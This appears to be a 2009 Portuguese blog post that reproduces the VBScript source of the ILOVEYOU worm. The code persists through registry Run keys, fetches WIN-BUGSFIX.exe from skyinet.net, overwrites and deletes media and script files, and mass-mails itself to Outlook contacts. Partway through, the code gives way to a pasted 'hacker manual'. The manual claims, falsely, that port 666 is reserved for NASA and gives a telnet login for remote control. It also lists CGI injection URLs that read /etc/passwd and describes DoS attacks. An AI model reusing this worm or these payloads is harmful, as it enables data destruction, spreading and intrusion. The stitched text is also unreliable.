terça-feira, 14 de julho de 2009

Codigo-fonte do 4º maior virus o I LOVE YOU

rem barok -loveletter(vbe)
rem by: spyder /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname, mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="

Manual do Hacker

Manual do Hacker completo - passo a passo

=====INVASÃO PELA PORTA 666=====

MAS O QUE É ISSO?


É UMA PORTA QUE SÓ PODERIA SER USADA PELO GOVERNO AMERICANO E NASA, TANTO QUE ELES COMUNICAM-SE POR ESTA PORTA. BOM, PARA SE CONECTAR POR ELA NÃO É NADA FÁCIL, MAS PRECISA DE ALGUNS AJUSTES, É MAIS UMA COISA PARA PEGAR COISAS NA CASA DE UM AMIGO SEM ELE FICAR SABENDO.

O QUE VOCÊ PRECISA:

VOCÊ PRECISA DE UM PROGRAMA CHAMADO AABOUT (www.sites.uol.com.br/HACKERSBRASIL), E PEGUE ESTE PROGRAMA. VOCÊ PRECISA DE UM PROGRAMA PARA ACESSAR TELNET. PARA QUEM NÃO SABE ESTE PROGRAMA FICA NO DIRETÓRIO WINDOWS. PRONTO? JÁ TENHO TUDO AGORA? AGORA É SÓ CHAMAR UM AMIGO PARA UMA CONVERSA PELO ICQ, OU PELO CHAT, ELE TAMBÉM DEVE TER AS DUAS FERRAMENTAS. DEPOIS DE CHAMÁ-LO, OS DOIS DEVEM EXECUTAR O AABOUT. DEPOIS, É SÓ ABRIR O TELNET E NO HOST COLOCAR O IP DINÂMICO DA VÍTIMA E SE CONECTAR A PORTA 666 E NO LOGIN A PALAVRA GR!. O PONTO DE EXCLAMAÇÃO DEVE PERMANECER. PRONTO! AGORA VOCÊ ESTARÁ EM UM PROMPT! É SÓ DAR UM DIR, E VOCÊ TEM TOTAL CONTROLE SOBRE O PC DO CARA! TANTO CONTROLE QUE PODE CHEGAR A DAR UM FORMAT C: , POR ISSO, SÓ FAÇA ISSO COM SEUS AMIGOS.

=====SPOOFING=====
PARA QUE VOCÊ COMPREENDA ESTE TEXTO É NECESSÁRIO QUE VOCÊ TENHA ALGUNS CONHECIMENTOS SOBRE UNIX E PROTOCOLOS TCP/IP.

ANTES DE MAIS NADA, O SPOOFING NÃO É UM ATAQUE, E SIM PARTE DE UM. LOGO, O SPOOFING É UMA ESPÉCIE DE TÉCNICA DE ATAQUE, DO QUAL O HACKER PODE MASCARAR SEU ENDEREÇO IP OU DNS, POR EXEMPLO, DIZENDO AO SISTEMA QUE ELE VAI ATACAR, QUE ELE É CONFIÁVEL. ISSO OCORRE POR QUE AS COMUNICAÇÕES ENTRE COMPUTADORES NA INTERNET SE BASEIA NESTES ENDEREÇOS "CONFIÁVEIS" PARA TROCAREM INFORMAÇÕES. UMA MÁQUINA A PODE MANTER UMA COMUNICAÇÃO COM UMA MÁQUINA B SEM QUE SEJA NECESSÁRIO VERIFICAR TODA HORA SE A INFORMAÇÃO É AUTÊNTICA ENTRE ELAS. O HACKER, ENTÃO, PÕE UMA ESPÉCIE DE DISFARCE EM SEU PC, DIZENDO PARA A MÁQUINA A QUE ELE É A MÁQUINA B. ASSIM, A MÁQUINA A VAI ACEITAR TODOS OS SEUS COMANDOS E, ENTÃO, O CARA PODE FAZER TUDO O QUE QUISER NELA. OS TIPOS MAIS COMUNS DE SPOOFING SÃO: IP-SPOOFING, DNS-SPOOFING, WEB-SPOOFING, E-MAIL-SPOOFING ENTRE OUTROS.

COMO FOI MENCIONADO ANTERIORMENTE, NO SPOOFING O INVASOR TOMA A IDENTIDADE DE HOST CONFIÁVEL. EM UMA REDE UNIX PODEMOS CONFIGURAR HOSTS CONFIÁVEIS. SE UMA MÁQUINA UNIX CRIA EM SEU DIRETORIO/HOME UM ARQUIVO CHAMADO RHOSTS COM OS NOMES DE HOSTS, LOGO QUALQUER USUÁRIO QUE TENHA O USER ID QUE VOCÊ COLOCOU NESTE ARQUIVO PODE LOGAR-SE NA SUA CONTA USANDO O RLOGIN.

O RLOGIN É UM PROTOCOLO BASEADO EM CLIENTE /SERVIDOR SIMPLES, QUE USA O TCP COMO PROTOCOLO DE COMUNICAÇÃO. O RLOGIN PERMITE AO USUÁRIO LOGAR-SE REMOTAMENTE DE UM HOST AO OUTRO. SE A MÁQUINA ALVO CONFIAR NA MÁQUINA DESTE USUÁRIO, O RLOGIN PERMITIRÁ A CONVENIÊNCIA DE NÃO PEDIR PASSWORD. ELA SOMENTE IRÁ AUTETICAR O CLIENTE VIA ENDEREÇO IP. ENTÃO PODEMOS EXECUTAR COMANDOS REMOTOS COMO RSH, DESDE QUE DEDE QUE AQUELES HOSTS "CONFIÁVEIS" ESTEJAM LISTADOS NO RHOSTS, SEM PEDIR PASSWORD. OUTRA POSSIBILIDADE É LISTAR NOMES DE HOSTS NO ARQUIVO /ETC/HOSTS.EQUIV. NESTE CASO, QUALQUER USUÁRIO DAS MÁQUINAS LISTADAS PODE TAMBÉM LOGAR-SE NO HOST LOCAL SEM UMA PASSWORD.

THREE-WAY HADSHAKE: QUANDO UM HOST ENVIA UMA MENSAGEM A UM OUTRO HOST ESTE PODE SER DIVIDIDO EM UM NÚMERO DE SEGMENTOS E REDICIONADO AO HOST DESTINO POR TCP. O IP SOMENTE SE ENCARREGADE ROTEÁ-LO. QUANDO UMA APLICAÇÃO EM UM CLIENTE QUER ALCANÇAR A OUTRA EM UM SERVIDOR, DEVE CONHECER A O IP DA MÁQUINA-DESTINO E Ó NÚMERO DA PORTA TCP DESIGNADO À APLICAÇÃO, E DECIDIR ENTÃO A CONEXÃO DESTINO. (CONEXÃO-DESTINO=DIREÇÃO IP+PORTA TCP).

PARA ESTABELECER UMA CONEXÃO, O TCP UTILIZA UM PROCEDIMENTO DENOMINADO "3-WAY HANDSHAKE". NESTE PROCESSO, 3 MENSAGENS (SYN, SYN/ACK y ACK) SÃO REQUERIDAS PARA ESTABELECER A CONEXÃO. ENTRE A INFORMAÇÃO INTERCAMBIADA ESTÁ A DIREÇÃO DE CADA MÁQUINA E O NÚMERO DE SEQUENCIA INICIAL (#SI) QUE AMBAS UTILIZARÃO PARA ESTABELECER A COMINICAÇÃO. ESTES NÚMEROS SÃO EXCLUSIVOS PARA A COMUNICAÇÃO ENTRE ESSAS DUAS MÁQUINAS, E SE BASEIAM NA HORA DO RELÓGIO INTERNO DO SISTEMA. UMA VEZ ABERTA A CONEXÃO. AS DUAS MÁQUINAS JÁ "AUTENTICADAS", ESTÃO PRONTAS PARA TROCAR DADOS.

=====ATAQUE POR MONITORAÇÃO=====
ATAQUES POR MONITORAÇÃO SÃO BASEADOS EM SOFTWARE DE MONITORAÇÃO DE REDE CONHECIDO COMO SNIFFER, INSTALADO PELOS INVASORES. O SNIFFER GRAVA OS PRIMEIROS 128 BYTES DE CADA SESSÃO LOGIN, TELNET E FTP SESSION VISTA NAQUELE SEGMENTO DE REDE LOCAL COMPROMETENDO TODO O TRÁFEGO DE/PARA QUALQUER MÁQUINA NAQUELE SEGMENTO, BEM COMO O TRÁFEGO QUE PASSAR POR AQUELE SEGMENTO. OS NOMES CAPTURADOS INCLUEM O HOST DESTINO, O USERNAME E A PASSWORD. A INFORMAÇÃO É GRAVADA NUM ARQUIVO POSTERIORMENTE RECUPERADO PELO INVASOR PARA TER ACESSO A OUTRAS MÁQUINAS. EM MUITOS CASOS OS INVASORES OBTEM ACESSO INICIAL AOS SISTEMAS USANDO UMA DAS SEGUINTES TÉCNICAS: OBTEM O ARQUIVO DE PASSWORDS VIA FTP EM SISTEMAS IMPROPRIAMENTE CONFIGURADOS; OBTEM O ARQUIVO DE PASSWORDS DE SISTEMAS RODANDO VERSÕES INSEGURAS DO NIS; OBTEM ACESSO AO SISTEMA DE ARQUIVOS LOCAIS VIA PONTOS EXPORTADOS PARA MONTAGEM COM NFS, SEM RESTRIÇÕES; USAM UM NOME DE LOGIN E PASSWORD CAPTURADA POR UM SNIFFER RODANDO EM OUTRO SISTEMA. UMA VEZ NO SISTEMA, OS INVASORES OBTEM PRIVILÉGIOS DE ROOT EXPLORANDO VULNERABILIDADES CONHECIDAS, TAÇ COMO RDISTSUN SPARC INTEGER DIVISION E ARQUIVOS UTMP POSSÍVEIS DE ESCRITA POR TODO MUNDO OU USANDO UMA PASSWORD DE ROOT CAPTURADA. ELES ENTÃO INSTALAM O SOFTWARE SNIFFER, REGISTRANDO A INFORMAÇÃO CAPTURADA NUM ARQUIVO INVISÍVEL.

ADICIONALMENTE, ELES INSTALAM CAVALOS DE TRÓIA EM SUBSTITUIÇÃO E UMA OU MAIS DENTRE OS SEGUINTES ARQUIVOS DE SISTEMA, PARA OCULTAR SUA PRESENÇA:

/BIN/LOGIN

/USR/ETC/IN.TELNETD

/USR/KVM/PS

/USR/UCB/NETSTAT



ENTENDA O BARRAMENTO DO MICRO

ISA- O BARRAMENTO SURGIU COM OS XT´S, O ISA ORIGINAIS ERAM DE 8 BITS E RODAVAM A 4,77 MHZ. COM O ADVENTO DOS AT, VAIO O ISA DE 16 BITS QUE OPERAVAM A 8 MHZ., UTILIZADOS ATÉ HOJE.

POR EXEMPLO, AS FAX-MODEM POSSUEM BARRAMENTO ISA DE 8 BITS.

OS BARRAMENTOS UTILIZADOS ATUALMENTE SÃO O ISA, VESA E PCI, ESSES DOIS ÚLTIMOS SÃO O QUE SE CHAMA DE LOCAL BUS.

SÃO CAHMADOS DE LOCAL BUS POR FUNCIONAREM EM CONEXÃO DIRETA COM A CPU.

VESA- HOJE MUITO POPULAR, NÃO CHEGA A CONSTITUIR UM BARRAMENTO NOVO, ELE É BASICAMENTE UM ISA ALTERADO, E É UM BARRAMENTO RÁPIDO, DE 32 BITS E FREQÜÊNCIA DE FUNCIONAMENTO DE 33 MHZ. A VELOCIDADE DE TRANSMISSÃO É DE 130MBITS/S.

=====ROUBANDO SENHAS DE SITES=====
ESTAS SENHAS PERMITEM QUE VOCÊ ENTRE EM SITES RESTRITOS QUE NECESSITAM DE SENHA PARA ENTRAR. (NÃO FUNCIONA EM TODOS)

phf http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd php.cgi http://xxx.xxx.xxx/cgi-bin/php.cgi?/etc/passwd test-cgi http://xxx.xxx.xxx/cgi-bin/test-cgi?/etc/* query http://xxx.xxx.xxx/cgi-bin/query?%0a/bin/cat%20/etc/passwd faxsurvey http://xxx.xxx.xxx/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd htmlscript http://xxx.xxx.xxx/cgi-bin/htmlscript?../../../../etc/passwd webdist.cgi http://xxx.xxx.xxx/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd nph-test-cgi http://xxx.xxx.xxx/cgi-bin/nph-test-cgi?/etc/* echo http://xxx.xxx.xxx/cgi-bin/echo?%0Acat%20/etc/passwd view-source http://xxx.xxx.xxx/cgi-bin/view-source?../../../../../etc/passwd pfdisplay http://xxx.xxx.xxx/cgi-bin/pfdispaly.cgi?/../../../../etc/passwd campas http://xxx.xxx.xxx/cgi-bin/campas?%0acat%0a/etc/passwd%0a wrap http://xxx.xxx.xxx/cgi-bin/wrap?/../../../../../etc whatever http://xxx.xxx.xxx/cgi-bin/handler/whatever;cat /etc/passwd|? data=Download xenolith http://xxx.xxx.xxx/cgi-bin/handler/xenolith;cat /etc/passwd/| ?data=Download

Substitua o xxx.xxx.xxx pelo endereço do site

DoS
PARA COMEÇAR A ESCREVER SOBRE DoS, NADA MELHOR DO QUE EXPLICAR O QUE É ISSO. O LAMMER VEM E DIZ: " EU SEI! É UM SISTEMA OPERACIONAU SUPER LEGAL CRIADU PELU BIU GAYTIS, PAI DU MERCADU DI SOFITIWARE! I EU SEI TUDU DELI!" NÃO!!!!! O HACKING NÃO SE LIMITA A MERDAS COMO DOS LAMMAH! NA VERDADE NEM SEI SE CHEGA A INCLUIR TAMANHA BOSTA. ASSIM, DOS E DoS SÃO COISAS DIFERENTES. ENQUANTO DOS QUER DIZER "DISK OPERATING SYSTEM", DoS QUER DIZER "DENIAL OF SERVICE". DoS É UM ATAQUE MUITO ÚTIL, E COMO O PRÓPRIO NOME DIZ, NEGA UM DETERMINADO TIPO DE SERVIÇO AOS USUÁRIOS, ISTO É, IMPEDE QUE ACESSEM UM DETEMINADO SERVOÇO DO HOST.

PODE-SE TER COMO ALVO DE UM DoS DESDE O MAIS BAIXO LAYERDO TCP/IP ATÉ STACK ATÉ O LAYER DE APLICAÇÃO, TRAVANDO O IRC DO CARA, POR EXEMPLO. COMO VEREMOS AQUI, NÃO EXISTE UM ATAQUE DE DoS, E SIM VÁRIOS TIPOS DE ATAQUES QUE PODEM SER CONSIDERADOS COMO DoS, CADA UM DELES ATACANDO UMA PARTE DO TCP/IP E DOS SEUS SUBPROTOCOLOS.

A UTILIDADE? VÁRIAS! O PRÓPRIO MAIL BOMB PODE SER CLASSIFICADO COMO UM ATAQUE DE DoS, POIS ELE ENCHE A CAIXA DO MANÉ DE MENSAGENS IMPDINDO QUE ELE CHEQUE OU TALVEZ ATÉ TRAVANDO O POP3. OUTRO EXEMPLO É O WINNUKE, QUE ATACA UM DRIVER DO TCP/IP E FAZ COISAS QUE VARIAM DE CAIR A CONEXÃO DO CARA ATÉ RESETAR O MICRO DO SUJEITO. ASSIM, O DoS SURGE COMO UM NOVO CAMPO A SER EXPLORADO, INVESTIGANDO NÃO SOMENTE FUROS DE SEGURANÇA MAS SIM FRAQUEZAS NA MANEIRA COM QUE OS PROTOCOLOS E OS SISTEMAS OPERACIONAIS LIDAM COM DETERMINADOS TIPOS E QUANTIDADES DE DADOS. SE VOCÊ AINDA NÃO TOMOU UMA NOÇÃO CLARA DO QUE SERIA DoS, OS ATAQUES ABAIXO IRÃO AJUDÁ-LO A ENTENDER.

WINNUKE

OS AFETADOS: WIN 95 (INCLUINDO OSR2), E WINDOWS NT 4.0.

QUANDO O TITIO BILL GATE$ CRIOU WINDOWS 95 E CIA, PENSOU EM COMO SERIA A IMPLANTAÇÃO DO COMPARTILHAMENTO DE ARQUIVOS, DADA ATRAVÉS DE UM PROTOCOLO CHAMADO NETBIOS. QUERIA QUE FOSSE ALGO PRÁTICO, CONSTANTE E SEM

DIFICULDADES PARA O USUÁRIO FINAL. POR ISSO, RESERVOU AO NETBIOS A PORTA TCP/IP 139 E DEIXOU ELE ABERTA EM TODOS OS SISTEMAS, COMO UM DEFALT. ACONTECE QUE ACABARAM DESCOBRINDO QUE ERA POSSÍVEL FAZER UM ATAQUE DE DoS BEM INTERESSANTE COM ESSA PORTA 139. ESTE ATAQUE CONSISTE EM MANDAR UMA MENSAGEM OOB (OUT OF BAND) PARA ESSA PORTA E COMO O RWINDOWS NÃO SABE LIDAR COM ESSE TIPO DE MENSAGEM, OCORRE UM ERRO NO TCP/IP DO SEU RWINDOWS, FAZENDO APARECER PORTANTO, A FAMOSA TELA AZUL COM AS MENSAGENS DE ERRO DE DRIVER. EMBORA SEJA MAIS COMUM WINNUKAR UMA PESSOA PELA PORTA 139, ISSO PODE SER FEITO POR OUTRAS PORTAS RELACIONADAS AO NETBIOS (COMO 135 E 137), DESDE QUE ESTEJAM "ESCUTANDO".

LAND

OS AFETADOS- WIN95 (INCLUINDO OSR2), WIN NT 4.0 E BSDI 2.1 E OUTROS

ENTRE OUTROS, O LINUX NÃO É AFETADO A PARTIR DO KERNEL 2.0.30

ESSE ATAQUE USA UM MECANISMO INTERESSANTE, PORÉM NÃO CAUSA DANOS CONSIDERÁVEIS, SÓ CAUSANDO UMA CERTA LENTIDÃO POR ALGUNS INSTANTES. É O SEGUINTE: VOCÊ MANDA VÁRIOS PACOTES DE TCP/IP COM A FLAG SYN, SPOOFADOS COM O IP DO PRÓPRIO ALVO. A FLAG SYN É A FLAG DO TCP/IP RESPNSÁVEL POR INICIAR UMA CONEXÃO TCP/IP, CONHECIDA COMO TRHEE WAY HANDSHAKING. ASSIM, AO RECEBER UMA FLAG SYN, O TCP/IP RESPONDE O CLIENTE IMEDIATAMENTE COM UM PACOTE COM AS FLAGS SYN E ACK. O QUE O LAND FAZ É O SEGUINTE: COMO AS SYN REQUESTS ESTÃO SPOOFADAS COM O IP DO PRÓPRIO ALVO, ESSE ALVO ACABA MANDANDO AS SYN ACK´S PARA ELE MESMO, CAUSANDO UMA LENTIDÃO ENORME NO SISTEMA E CHEGANDO ATÉ A TRAVÁ-LO EM ALGUMAS VARIAÇÕES. SIMPLES E EFICIENTE.

TEARDROP

AS AFETADOS- WIN 95 (INCLUINDO OSR2), WIN NT E LINUX

ESSE ATAQUE TAMBÉM É MUITO FAMOSO. ELE EXPLORA UM BUG PRESENTE NO LAYER IP (RELACIONADO À FRAGMENTAÇÃO DE DATAGRAMAS IP) DO TCP/IP STACK DOS DIFERENTES OS´S CITADOS ACIMA. QUANDO A VÍTIMA RECEBE DETERMINADOS DADOS, SEU SISTEMA PODE CONGELAR REPENTINAMENTE SUA CONEXÃO CAI E NO CASO DE SISTEMAS WINDOWS PODE ATÉ SER QUE APAREÇA A FAMOSA E TEMIDA TELA AZUL, ACUSNDO UM ERRO. ENTRETANTO, ESSE BUG NÃO CAUSA GRAVES DANOS E UM SIMPLES REBOOT IRÁ NORMALIZAR TUDO.

VOCÊ ENCONTRARÁ MAIORES DETALHES NA BOA E VELHA ROOTSHELL (HTTP://WWW.ROOTSHELL.COM). É SÓ DAR UM SEARCH.

SSPING/JOLT

OS AFETADOS- WIN 95 (INCLUINDO OSR2), WIN NT 4.0 E ANTIGAS VERSÕES DE MAC’OS.

ESSE EXPLOITS DESENTERRA O VELHO PROBLEMA DOS SISTEMAS WINDOWS COM O PROTOCOLO ICMP, E MAIS ESPECIFICAMENTE COM A FUNÇÃO PING. O QUE O SSPING FAZ É QUE ELE CRIA PACOTES DE DADOS ICMP MUITO GRANDES (MAIS QUE O PERMITIDO), OS FRAGMENTA EM VÁRIAS PARTES (PARA PODER ENVIAR) E OS ENVIA DE UMA VEZ SÓ PARA O ALVO. QUANDO O ALVO PEGA ESSES FRAGMENTOS E TENTA REMONTAR OS PACOTES ORIGINAIS ELE TRAVA E É PRECISO REINICIÁ-LO.

BONK/BOINK

OS AFETADOS- WIN 95 (INCLUINDO OSR2) E WIN NT 4.0.

ESSES DOIS SÃO NA VERDADE VARIAÇÕES DO CONHECIDO TEARDROP. O BONK SERIA UM TEARDROP QUE TRAVA MESMO MÁQUINAS PATCHEADAS. JÁ O BOINK É UMA VERSÃO MAIS AVANÇADA DO BONK E PERMITE QUE PORTAS UDP SEJAM USADAS COMO ALVO. ESSES FATOS SE BASEIAM NO FATO DE QUE O WINDOWS PODE TRAVAR SE RECEBER MUITOS PACOTES UDP CORROMPIDOS. ASSIM O PROGRAMA MANDA VÁRIOS DATAGRAMAS IP FRAGMENTADOS E NO COMPUTADOR ALVO SÃO REMONTADOS EM PACOTES UDP INVÁLIDOS ATRAVÉS DO "OVERLAPPING BUG", TAMBÉM MUITO EXPLORADO NO TEARDROP.

SMURF

OS AFETADOS- TODOS. ISSO MESMO! VOCÊ OUVIU BEM! T-O-D-O-S!

AGORA CHEGOU A HORA DE FALAR SOBRE UM DOS ATAQUES MAIS EFICIENTES E LOUCOS. O SMURF! A SIMPLICIDADE DESSE ATAQUE CHEGA A IMPRESSIONAR QUANDO SE OBSERVA OS DANOS QUE PODEM SER CAUSADOS. ENTRE TODOS OS DoS DESCRITOS ATÉ AQUI, ESSE É O PRIMEIRO QUE NÃO ENVOLVE APENAS DOIS COMPUTADORES: O INVASOR E A VÍTIMA, MAIS SIM CENTENAS, ATÉ MILHARES DE HOSTS, CONTRA APENAS UM SÓ!! DEVASTADOR!!

O QUE O SMURF FAZ É QUE ELE MANDA UM BROADCAST DE PACOTES ICMP (MANDA PARA VÁRIOS ENDEREÇOS, CONTIDOS EM UMA LISTA A SER CRIADA POR VOCÊ) SÓ QUE COM O ENDEREÇO DE ORIGEM SPOOFADO COM O IP DA VÍTIMA. ASSIM, TODOS OS COMPUTADORES QUE FORAM PINGADOS IRÃO RESPONDER UNICAMENTE PARA ESSE COMPUTADOR VÍTIMA.

POR EXEMPLO: SE VOCÊ MANDA UM PING PRA 1000 COMPUTADORES E ESSE PING TEM COMO IP DE ORIGEM O IP DA VÍTIMA, ESSE COITADO IRÁ RECEBER NADA MAIS NADA MENOS DO QUE 1000 PACOTES ICMP DE RESPOSTA!!!!! QUASE AO MESMO TEMPO!!! ISSO SIMPLESMENTE DETONA COM O MICRO DO CARA E TRAVA ELE TOTALMENTE, TENDO QUE SER REINICIADO.

FINGER DoS

OS QUE ESTÃO RODANDO FINGER UNPATCHEADO

PARA QUEM NÃO SABE, FINGER É UM SERVIÇO MUITO PRESENTE EM SISTEMA MULTIUSUÁRIO (ESPECIALMENTE SISTEMAS UNIX) QUE MOSTRA QUEM ESTÁ LOGADO NO SISTEMA, SEUS LOGINS, TERMINAIS QUE ESTÃO UTILIZANDO, TEMPO QUE ESTÃO LOGADOS, ETC. É BEM ÚTIL NA OBTENÇÃO DE INFORMAÇÃO PARA UMA HACKEADA, MAS NÃO É DISSO QUE ESTAMOS FALANDO AGORA.

O FINGER OPERA NA PORTA 79 E FUNCIONA NO ESQUEMA REQUEST-ANSWER. ASSIM, VOCÊ FAZ UM FINGER REQUEST PARA O FINGERD DE UM HOST E ESTE HOST TE RESPONDE, DE ACORDO COM A REQUEST QUE FOI FEITA.

SE VOCÊ QUISER SABER QUEM ESTÁ LOGADO NO SISTEMA VOCÊ DÁ O COMANDO FINGER@SISTEMA .COM.BR E LOGO VERÁ UMA LISTA DE USUÁRIOS LOGADOS.

SE QUISER SABER INFORMAÇÕES SOBRE UM DETERMINADO USUÁRIO VOCÊ DÁ O COMANDO FINGER USUÁRIO@SISTEMA.COM.BR.

O ATAQUE CONSITE EM VÁRIOS REQUESTS ENVIADOS RAPIDAMENTE PARA O ALVO. USUÁRIO@@@@@@@@@@SISTEMA.COM.BR.

CADA @ QUE VOCÊ COLOCOU REPRESENTA UM REQUEST E LOGO ASSIM, O COMPUTADOR DA VÍTIMA SOFRERÁ UM FLOOD DE REQUESTS, O QUE DIMINUIRÁ O DESEMPENHO. (NUNCA SOUBE DE NENHUM TRAVAMENTO OCASIONADO POR ESTE ATAQUE).

